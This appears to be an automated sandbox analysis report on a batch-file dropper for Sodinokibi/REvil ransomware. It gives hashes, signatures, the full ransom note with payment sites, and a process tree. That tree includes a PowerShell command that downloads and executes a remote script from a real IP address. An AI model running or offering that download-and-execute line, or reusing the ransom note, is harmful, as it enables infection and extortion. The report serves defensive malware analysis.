Analysis

  • max time kernel
    140s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    17-03-2020 17:10

General

  • Target

    ydPBfFLN.bat

  • Size

    196B

  • MD5

    50fdb1991ec03a3aa2a0e43f003b45fa

  • SHA1

    fd5349455dc0e38995beffbb501656e0cb76b8f3

  • SHA256

    36b783132e9054391ec692f5470a2e2b0a9cdce7a09018477bb7eeefa7fc6739

  • SHA512

    e7f5f38700f49162fae8c8f3a0ac9a06cac833321c2c39235f10c711c69de29dc9c4dca5806bd89810e1e2fcdbd3e0e3cd2a4e76ba2965baac703d7aeb0f1b82

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/ydPBfFLN

Extracted

Path

C:\3m5a151n-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3m5a151n. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/68C81B5610D86BA9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/68C81B5610D86BA9 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: QeZuoNNkdLuyyG9KKNupRsMv4vF7+kJ4StTOtZvlBbAC+jycnEqNKWT+NbvGNJuu tWEBlJGG0FllIr/9kJMTSa/XxW/xCdIeiGu3oCW2GfzeC9OkAvYhXyckRcjmfY/F wcswZ3oaqPN2qMky7SV9Z8+bI4JqZAhxcKrBpkAnZyW1EH0uSArVoJCKfz0F8cUC X6gkXupIRjC9uPJ+1HwtTWj2lgIB4zMd8i5YvTUkVALfI5q6b939VIxLtrSw6+vm k6+BkQzviogudKe/pGbCX1MdZgIeU7dPJcWqdf7RSy1BMmr3jHBtkZqwBiw9/9Xo xd4CxFNj1h0kc/EyMYmwB6xwZz31GHTRtS3igN1UVlqxWrfhCEqzo/u3gmdlx++M c6Yq+2Re9YXpkBPYHGUrfTnJhWiS0F/q7Ce6AQEKL9cScr2Z6xYwwviWCiOm7DDI 6FvDWDC0Pyn+nsRSI/TPBS8v19TseHOytouEDpUHHglzyQzLNlAT4aU0dnLtT3bC 1ZKLOtgRU7+MGVU/rLz0GGszJB+4xbd9a5zMH6/mdGlifN2nvJ/ZaoSIt4RYG4mD r3gL75pAZeQHczSBKCdcxbOCzQKCaaHUdRboFWw6boUZZhNEiwxcNOeYqX33bAB1 cgQwfBA1QaY5NGWqIqZY3vaLb0CNtyPyMNLw9FSchLNpHyv2LQ5CLZFHRUZaZrn0 GW0xm5mhoLW2b/YJCqrQTocjGUubzms1recgu7+nILMwHfWhVYpjDWToKLZhJolD HinNvCTMFTYf+xtPSIEYhus0pNZyYYZwrkvEVv4JyTFJO5gpYYznCFj+aORfbRoB cpVCJg1TkHOdyWsVB3QQ7O9dLbO6/+akskNsHwW1xOQAnvWYavkyYYQKGBioE3FA QnTMRse1fNmnspijxcXWTFcDvPIKQDGneXegBjAbk71apIvrJlV2K48kMv8tKlhG 8TBwVy4OFduI+EDs3RbE9hETffmgjPSfTAg4OEdwusO8LRUce4rQkur+4RrFDTyH 1V9l8ueDH8RZBZiFVb2bwYf8FUXSTq17yQigTGi2OERLrjHSGvuXC78V7vpbBzQd 8RhPmNsUcFhRA2K4oVup2Wd28etf7jtAS3vJcEkAgR6xlY2vQXV3W4fyjxQk5vcF B5ST5heQbtZSMA0tAozG5gq2QdeVu86uA/C640KygmdpC1I/S30wFUV/c3LQbJdd rUiMl0Dm4ggmoUNEBYInoHA6EgJSwcsrVOB9xM+0BmlE3DTLb9RxtCauNv1HT0mT BYQYGPBq76vtrECfIjQlOcFu95u+Px/g/oO1ZPhQ+h8KLAR1 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/68C81B5610D86BA9

http://decryptor.cc/68C81B5610D86BA9

Signatures

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 19 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Blacklisted process makes network request 122 IoCs
  • Discovering connected drives 3 TTPs 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ydPBfFLN.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ydPBfFLN');Invoke-MWMIOGLDAXQVF;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      • Discovering connected drives
      PID:1888

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads